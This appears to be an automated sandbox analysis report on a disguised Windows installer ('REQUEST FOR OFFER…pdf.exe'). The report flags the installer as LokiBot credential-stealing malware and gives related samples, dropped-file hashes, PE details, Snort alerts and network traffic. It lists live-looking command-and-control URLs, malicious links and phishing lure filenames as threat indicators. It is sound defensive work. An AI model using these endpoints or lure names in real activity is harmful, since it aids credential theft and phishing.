	DHL Receipt_12248117733.exe	Get hash	malicious	Browse	157.245.36.27/~dokterpol/?page=1806710989428
	SecuriteInfo.com.Trojan.MSIL.Crypt.16807.2508.exe	Get hash	malicious	Browse	157.245.36.27/~dokterpol/?page=447989547
	P8NOIUExsx.exe	Get hash	malicious	Browse	157.245.36.27/~dokterpol/?page=1806710989428
	TNT Express Shipment documents.exe	Get hash	malicious	Browse	157.245.36.27/~dokterpol/?page=1806710989428
	SecuriteInfo.com.Win32.PWSX-gen.3565.20341.exe	Get hash	malicious	Browse	157.245.36.27/~dokterpol/?page=14914169539334
	SecuriteInfo.com.Win32.PWSX-gen.31000.9015.exe	Get hash	malicious	Browse	157.245.36.27/~dokterpol/?page=447989547
	SecuriteInfo.com.Win32.PWSX-gen.8950.26130.exe	Get hash	malicious	Browse	157.245.36.27/~dokterpol/?page=157367330
	SecuriteInfo.com.Trojan.Packed2.44634.18228.10179.exe	Get hash	malicious	Browse	157.245.36.27/~dokterpol/?page=14914169539334
	SecuriteInfo.com.Trojan.Packed2.44634.15728.5266.exe	Get hash	malicious	Browse	157.245.36.27/~dokterpol/?page=157367330
	SecuriteInfo.com.Trojan.Packed2.44634.11493.31945.exe	Get hash	malicious	Browse	157.245.36.27/~dokterpol/?page=1806710989428

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DIGITALOCEAN-ASNUS	http://161.35.236.24/tddwrt7s.sh	Get hash	malicious	Browse	161.35.236.24
	SecuriteInfo.com.Win32.CrypterX-gen.24912.15475.exe	Get hash	malicious	Browse	188.166.187.79
	SecuriteInfo.com.Win32.CrypterX-gen.5299.10652.exe	Get hash	malicious	Browse	157.245.36.27
	SecuriteInfo.com.Win32.CrypterX-gen.16598.12230.exe	Get hash	malicious	Browse	157.245.36.27
	http://de.achievewealthy.co.in/vip/DE/3792/?bet=28368923	Get hash	malicious	Browse	198.211.98.91
	DHL Express Shipment DOC..exe	Get hash	malicious	Browse	157.245.36.27
	SecuriteInfo.com.Win32.PWSX-gen.13189.5701.exe	Get hash	malicious	Browse	157.245.36.27
	SecuriteInfo.com.Win32.PWSX-gen.21656.6389.exe	Get hash	malicious	Browse	157.245.36.27
	SecuriteInfo.com.Win32.PWSX-gen.14230.29034.exe	Get hash	malicious	Browse	157.245.36.27
	QIsLuTv1ka.elf	Get hash	malicious	Browse	164.90.152.181
	http://nzc.app-dev.pw/	Get hash	malicious	Browse	128.199.109.33
	770178655752.exe	Get hash	malicious	Browse	157.245.36.27
	https://service.roccasoluciones.com/	Get hash	malicious	Browse	64.227.29.131
	DHL Invoice 1224811733.exe	Get hash	malicious	Browse	157.245.36.27
	Purchase Inquiry.exe	Get hash	malicious	Browse	157.245.36.27
	jklarm7.elf	Get hash	malicious	Browse	45.55.171.67
	arm7.elf	Get hash	malicious	Browse	157.230.180.190
	77017865573.exe	Get hash	malicious	Browse	157.245.36.27
	DHL Receipt_12248117733.exe	Get hash	malicious	Browse	157.245.36.27
	SecuriteInfo.com.Trojan.MSIL.Crypt.16807.2508.exe	Get hash	malicious	Browse	157.245.36.27

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	#U25b6 #Ud83d#Udd18#U2500#U2500#U2500#U2500#U2500#U2500#U2500 126 Voice-Attchment.919-340-XX.html	Get hash	malicious	Browse	142.250.185.238 142.250.185.161
	file.exe	Get hash	malicious	Browse	142.250.185.238 142.250.185.161
	http://big55555.com	Get hash	malicious	Browse	142.250.185.238 142.250.185.161
	PO.exe	Get hash	malicious	Browse	142.250.185.238 142.250.185.161
	Benefits_Enrollment.html	Get hash	malicious	Browse	142.250.185.238 142.250.185.161
	Markelcorp Pay Application November 29, 2022_11725512247820161423.html	Get hash	malicious	Browse	142.250.185.238 142.250.185.161
	https://cialistabspharmacy.com/polaris/?aW52b2ljZUBlbWVyZ2lmaS5jb20=&d=DwMFAg	Get hash	malicious	Browse	142.250.185.238 142.250.185.161
	era 1.exe	Get hash	malicious	Browse	142.250.185.238 142.250.185.161
	Markelcorp Pay-Application Completed November 29, 2022_48707712230774110046.html	Get hash	malicious	Browse	142.250.185.238 142.250.185.161
	Remittance.html	Get hash	malicious	Browse	142.250.185.238 142.250.185.161
	November Draw Disbursed.html	Get hash	malicious	Browse	142.250.185.238 142.250.185.161
	November Draw Disbursed.html	Get hash	malicious	Browse	142.250.185.238 142.250.185.161
	7a087c1bcd038c61ddb0f634f9b21e6db9bed59842f19.exe	Get hash	malicious	Browse	142.250.185.238 142.250.185.161
	https://dobredrogi.exone-web.pl/INDEX.Php/login/ses/	Get hash	malicious	Browse	142.250.185.238 142.250.185.161
	http://web.jiont2.com	Get hash	malicious	Browse	142.250.185.238 142.250.185.161
	https://b6dj2ueylkg.juraganrc.com/?url=aHR0cHM6Ly9ob2xseS1sYXZlbmRlci1yYXR0bGVzbmFrZS5nbGl0Y2gubWUvdmlsZC5odG1s	Get hash	malicious	Browse	142.250.185.238 142.250.185.161
	0321423605241625.exe	Get hash	malicious	Browse	142.250.185.238 142.250.185.161
	PDF.shtml	Get hash	malicious	Browse	142.250.185.238 142.250.185.161
	Notification Details.html	Get hash	malicious	Browse	142.250.185.238 142.250.185.161
	https://schemevolcanosuspicions.com	Get hash	malicious	Browse	142.250.185.238 142.250.185.161

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll	SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe	Get hash	malicious	Browse
	ACP-2210825ORDER.xls	Get hash	malicious	Browse
	Services_Jingce_Quotation28112022.exe	Get hash	malicious	Browse
	Services_Jingce_Quotation28112022.exe	Get hash	malicious	Browse
	98765434567890.exe	Get hash	malicious	Browse
	98765434567890.exe	Get hash	malicious	Browse
	ORI-0876543200987 (1).exe	Get hash	malicious	Browse
	DC-098432345678909 (2).exe	Get hash	malicious	Browse
	ORI-0876543200987 (1).exe	Get hash	malicious	Browse
	DC-098432345678909 (2).exe	Get hash	malicious	Browse
	https://repo.anaconda.com/miniconda/Miniconda3-py39_4.12.0-Windows-x86_64.exe	Get hash	malicious	Browse
	uWoMvSzdog.exe	Get hash	malicious	Browse
	uWoMvSzdog.exe	Get hash	malicious	Browse
	RFQ.exe	Get hash	malicious	Browse
	RFQ.exe	Get hash	malicious	Browse
	21831nRdnc.exe	Get hash	malicious	Browse
	21831nRdnc.exe	Get hash	malicious	Browse
	RFQ1258966.xls	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane\AsOpenFile.exe	xcVh7ZmH4Y.exe	Get hash	malicious	Browse
	xcVh7ZmH4Y.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane\AsOpenFile.exe

Download File

Process:	C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	38632
Entropy (8bit):	5.840976252158136
Encrypted:	false
SSDEEP:	768:tba0g4rhVUkxIIaPrd6cMCP1diTLmz1BeeKH2X98VwhH:HPUkxIIaPrsCPXK6z1Bee3+k
MD5:	ED609F8F09DE8AAA4F8CFF0285E0420A
SHA1:	A7ADE9EB5BD4BAEFAB796C1D6EA92417F1396135
SHA-256:	2488796ACE769813C729198CFD9E3C9D0A512168301D387BE569F2557C683821
SHA-512:	32F080433C121FE1970BBB82911024A389E43B8B6BA059931FF0F3AFA4096BE79660C6DC9C1E027C21692D320F95896B0211C9FA0997AEC30F7A373382443FF2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: xcVh7ZmH4Y.exe, Detection: malicious, Browse Filename: xcVh7ZmH4Y.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........!..r..r..r..4r..r..s..r..s..r..s..r..s..r..r..r..s..rp.s..rp.Xr..r.0r..rp.s..rRich..r........................PE..d......a..........#..........^.................@....................................Vo.... ..................................................N..........h....p..L....x...............B..p...................@D..(...@C...............0...............................text............................... ..`.rdata..*....0...0..."..............@..@.data........`.......R..............@....pdata..L....p.......T..............@..@.rsrc...h........ ...X..............@..@................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane\Tusindtallig.Syn

Download File

Process:	C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	29309
Entropy (8bit):	7.9930541941014255
Encrypted:	true
SSDEEP:	768:E49NB/CsjPddY0nfj1fIXSgH0uO7wt1WayrQ0bThetG:nlCsxfVIXHH2wOfKG
MD5:	849FDC040AA117FC8B8AC03C745C690D
SHA1:	831EE9C0B27F05069A323940A7C581CA21C9BE68
SHA-256:	3C6382D1FD4C832B2BBD7CDD2508DDAA80BF40D17732C8B17C31D70CED631A79
SHA-512:	A5F45B85DAD9FD26B7B111F402467D33B92E01F9C13CD4C2932FA53617746C246393BFEF020DAEE78F4C4515BABA2B50461DA761607CD97A200B3E2206BB08A6
Malicious:	false
Reputation:	low
Preview:	...'.A&:}.....Y8.)..rRqi....t.b.&..K1....vy}5j.........=.f.(.....3C....p+,+.`Y[]..'u.1.].].0..?KP..F.v\..M...(.V.M..^D".3.r..t....9\.N...R..6..K..S.....o\|.^Z b....C.G$.s(k^...m...r.L70.m.2q'.7.%*t..5u..d.#..T.,....%..5O?..".G._.(._V.......7e.``..r....~u.A..-o.7.{.....9.T<.+.H...u.}P..:...........p..t...^...D......#..0....j.?D.rG..".....C.....QP.......+.A..=...\|.X..J.w(..V.....>{8.... .7.2m...>..;=.-....Qq...cx.=.....3..m.x.#..../............3.w.@Rd.rVt..Q.v..1LW`]'..Bs.{...........5....J...t..o..1..M.........H,(ugAw.....C.]...J.y...<~(u.....\|..Y....B...}....(cn.....Gc..\|.6x6w.....HD....GV........r....u\......^Po.._\|]R.......R...\|. LH....Z/}(st..0..F..L...J.G 5\|.0t.q.x..m..W..X.k..=..k.+.a..U...r..f..\|<O...t.vN.)..>t..J.j....J.'..OR.-.S..cU....?X............L!......3....l...a..A.[c.,....2....p.~..!%..m.2.....[=.......r.n.6......G...1...IqV..fn..j...E..[........>.CZHT.......w..~7<=.......<8e..I.p..Q...f.....qD..]Xh..LA...J........7.....O..

C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane\prowl.Dgn

Download File

Process:	C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	141909
Entropy (8bit):	7.124693631306355
Encrypted:	false
SSDEEP:	3072:COxlLD2mpgf8pOxNjQzNUflgAG63+OAyam6kxnv:COxlmcg5EzuNG6MyaJSv
MD5:	0A951AA33DE8994CBE161F0E07F169B8
SHA1:	38033C58EEFF600D22A068F1A7F599646BDFDD1E
SHA-256:	4A98204499C5BA9F9518D6A7EF078A5A5F0B82173919E9A5D41179172BD28F60
SHA-512:	F9BE445FDBD89EB0F5CACBB325D89E89755906F1DADE3A7E32593E4ADFCBFF2C8927350226BB8FD0238B4F8F72377F757ADCDAFE20C7FA2FF41C4A14814D8A27
Malicious:	false
Reputation:	low
Preview:	.T.....i.. ..YA..^..;;..3Gn._+.P.a1TG...$;....r..K...8.W..gS..9j.t...j y._........e.....[z......Ae.8/.............................................................f........B..)...................................................................o..-...............................................7.Qf......B..e.................................................................f....L..2B........................................................................!..a....-.F..ooooooooooooooooooooooooooooooooooooooooo..c.B......JV.XS.......................................................................B.....f.r...=..U............................................................f....'.5~.......................................9x...f....:.e............................................................67..N..................................................!.f...f....9$}17................................................................2/..LPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPf......

C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	11776
Entropy (8bit):	5.656065698421856
Encrypted:	false
SSDEEP:	192:eY24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol+Sl:E8QIl975eXqlWBrz7YLOl+
MD5:	17ED1C86BD67E78ADE4712BE48A7D2BD
SHA1:	1CC9FE86D6D6030B4DAE45ECDDCE5907991C01A0
SHA-256:	BD046E6497B304E4EA4AB102CAB2B1F94CE09BDE0EEBBA4C59942A732679E4EB
SHA-512:	0CBED521E7D6D1F85977B3F7D3CA7AC34E1B5495B69FD8C7BFA1A846BAF53B0ECD06FE1AD02A3599082FFACAF8C71A3BB4E32DEC05F8E24859D736B828092CD5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 2%
Joe Sandbox View:	Filename: SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, Detection: malicious, Browse Filename: ACP-2210825ORDER.xls, Detection: malicious, Browse Filename: Services_Jingce_Quotation28112022.exe, Detection: malicious, Browse Filename: Services_Jingce_Quotation28112022.exe, Detection: malicious, Browse Filename: 98765434567890.exe, Detection: malicious, Browse Filename: 98765434567890.exe, Detection: malicious, Browse Filename: ORI-0876543200987 (1).exe, Detection: malicious, Browse Filename: DC-098432345678909 (2).exe, Detection: malicious, Browse Filename: ORI-0876543200987 (1).exe, Detection: malicious, Browse Filename: DC-098432345678909 (2).exe, Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: uWoMvSzdog.exe, Detection: malicious, Browse Filename: uWoMvSzdog.exe, Detection: malicious, Browse Filename: RFQ.exe, Detection: malicious, Browse Filename: RFQ.exe, Detection: malicious, Browse Filename: 21831nRdnc.exe, Detection: malicious, Browse Filename: 21831nRdnc.exe, Detection: malicious, Browse Filename: RFQ1258966.xls, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....MX...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\5D4ACB\B73EF6.lck

Download File

Process:	C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3425316567-2969588382-3778222414-1001\1b1d0082738e9f9011266f86ab9723d2_11389406-0377-47ed-98c7-d564e683c6eb

Download File

Process:	C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	47
Entropy (8bit):	1.1262763721961973
Encrypted:	false
SSDEEP:	3:/lSllIEXln:AWE1
MD5:	D69FB7CE74DAC48982B69816C3772E4E
SHA1:	B1C04CDB2567DC2B50D903B0E1D0D3211191E065
SHA-256:	8CC6CA5CA4D0FA03842A60D90A6141F0B8D64969E830FC899DBA60ACB4905396
SHA-512:	7E4EC58DA8335E43A4542E0F6E05FA2D15393E83634BE973AA3E758A870577BA0BA136F6E831907C4B30D587B8E6EEAFA2A4B8142F49714101BA50ECC294DDB0
Malicious:	false
Preview:	........................................user.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.875386203366202
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
File size:	194987
MD5:	b9f70f4146b846179fa182ac868d0c15
SHA1:	97cb5de0e0cc2f53cd73552f9d5b4381ab5a5907
SHA256:	ff235029990af0449ce8f82c5546dfe37170d5e27ce1a22b0a43965a980344be
SHA512:	2cc45205394074ddf9a5481a81b89582d84d42a34023329e06cf589c455c2fef144905362b5d1001e26026480d490304b6ac96526ab32f5344b1706d98ceff48
SSDEEP:	3072:MRD+3q3NxPTNuY/bQZFler2MUPaSa1y8XKdV06k55ohchNqV3AzlbEnJZGqItyWJ:mwq3NpNSFleCMUPVaidHXMNqwlInJ0q8
TLSH:	A714125533E0C523CAF202702DBB652F9EE9A642E262FF131360AF9D7D56307864C356
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P.._...P...P..OP.._...P...s...P...V...P..Rich.P..........PE..L...8.MX.................b...*......J4............@

File Icon


Icon Hash:	b2a88c96b2ca6a72

Static PE Info

General

Entrypoint:	0x40344a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x584DCA38 [Sun Dec 11 21:50:48 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	4ea4df5d94204fc550be1874e1b77ea7

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A230h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080B4h]
call dword ptr [004080B0h]
cmp ax, 00000006h
je 00007FED94512513h
push ebx
call 00007FED9451566Ch
cmp eax, ebx
je 00007FED94512509h
push 00000C00h
call eax
mov esi, 004082B8h
push esi
call 00007FED945155E6h
push esi
call dword ptr [0040815Ch]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007FED945124ECh
push ebp
push 00000009h
call 00007FED9451563Eh
push 00000007h
call 00007FED94515637h
mov dword ptr [0042A244h], eax
call dword ptr [0040803Ch]
push ebx
call dword ptr [004082A4h]
mov dword ptr [0042A2F8h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 004216E8h
call dword ptr [00408188h]
push 0040A384h
push 00429240h
call 00007FED94515220h
call dword ptr [004080ACh]
mov ebp, 00435000h
push eax
push ebp
call 00007FED9451520Eh
push ebx
call dword ptr [00408174h]
add word ptr [eax], 0000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8504	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0xb48	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b4	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x61f1	0x6200	False	0.6656967474489796	data	6.477074763411717	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x13a4	0x1400	False	0.4529296875	data	5.163001655755973	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x20338	0x600	False	0.501953125	data	3.9745558434885093	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2b000	0x3e000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0xb48	0xc00	False	0.4228515625	data	4.372183800985918	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x691c0	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States
RT_DIALOG	0x694a8	0x100	data	English	United States
RT_DIALOG	0x695a8	0x11c	data	English	United States
RT_DIALOG	0x696c8	0xc4	data	English	United States
RT_DIALOG	0x69790	0x60	data	English	United States
RT_GROUP_ICON	0x697f0	0x14	data	English	United States
RT_MANIFEST	0x69808	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, CreateFileW, GetFileSize, MoveFileW, SetFileAttributesW, GetModuleFileNameW, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, WaitForSingleObject, GetCurrentProcess, CompareFileTime, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GetDiskFreeSpaceW, lstrlenW, lstrcpynW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll	RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.11.20157.245.36.2749838802021641 11/30/22-00:31:37.333969	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49838	80	192.168.11.20	157.245.36.27
192.168.11.20157.245.36.2749838802024317 11/30/22-00:31:37.333969	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49838	80	192.168.11.20	157.245.36.27
192.168.11.20157.245.36.2749838802024312 11/30/22-00:31:37.333969	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49838	80	192.168.11.20	157.245.36.27

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 30, 2022 00:31:35.123769999 CET	49836	443	192.168.11.20	142.250.185.238
Nov 30, 2022 00:31:35.123786926 CET	443	49836	142.250.185.238	192.168.11.20
Nov 30, 2022 00:31:35.124044895 CET	49836	443	192.168.11.20	142.250.185.238
Nov 30, 2022 00:31:35.137362957 CET	49836	443	192.168.11.20	142.250.185.238
Nov 30, 2022 00:31:35.137372017 CET	443	49836	142.250.185.238	192.168.11.20
Nov 30, 2022 00:31:35.172802925 CET	443	49836	142.250.185.238	192.168.11.20
Nov 30, 2022 00:31:35.173031092 CET	49836	443	192.168.11.20	142.250.185.238
Nov 30, 2022 00:31:35.173213005 CET	49836	443	192.168.11.20	142.250.185.238
Nov 30, 2022 00:31:35.173417091 CET	443	49836	142.250.185.238	192.168.11.20
Nov 30, 2022 00:31:35.173674107 CET	49836	443	192.168.11.20	142.250.185.238
Nov 30, 2022 00:31:35.302972078 CET	49836	443	192.168.11.20	142.250.185.238
Nov 30, 2022 00:31:35.304261923 CET	443	49836	142.250.185.238	192.168.11.20
Nov 30, 2022 00:31:35.304462910 CET	49836	443	192.168.11.20	142.250.185.238
Nov 30, 2022 00:31:35.308245897 CET	49836	443	192.168.11.20	142.250.185.238
Nov 30, 2022 00:31:35.348491907 CET	443	49836	142.250.185.238	192.168.11.20
Nov 30, 2022 00:31:35.606657982 CET	443	49836	142.250.185.238	192.168.11.20
Nov 30, 2022 00:31:35.606863022 CET	443	49836	142.250.185.238	192.168.11.20
Nov 30, 2022 00:31:35.606874943 CET	49836	443	192.168.11.20	142.250.185.238
Nov 30, 2022 00:31:35.607048035 CET	49836	443	192.168.11.20	142.250.185.238
Nov 30, 2022 00:31:35.608479023 CET	49836	443	192.168.11.20	142.250.185.238
Nov 30, 2022 00:31:35.608555079 CET	443	49836	142.250.185.238	192.168.11.20
Nov 30, 2022 00:31:35.794887066 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:35.794929981 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:35.795146942 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:35.795490026 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:35.795507908 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:35.858731031 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:35.858937979 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:35.859126091 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:35.860200882 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:35.860357046 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:35.860357046 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:35.864449978 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:35.864485025 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:35.864960909 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:35.865122080 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:35.865542889 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:35.912424088 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.193646908 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.193851948 CET	443	49837	142.250.185.161	192.168.11.20
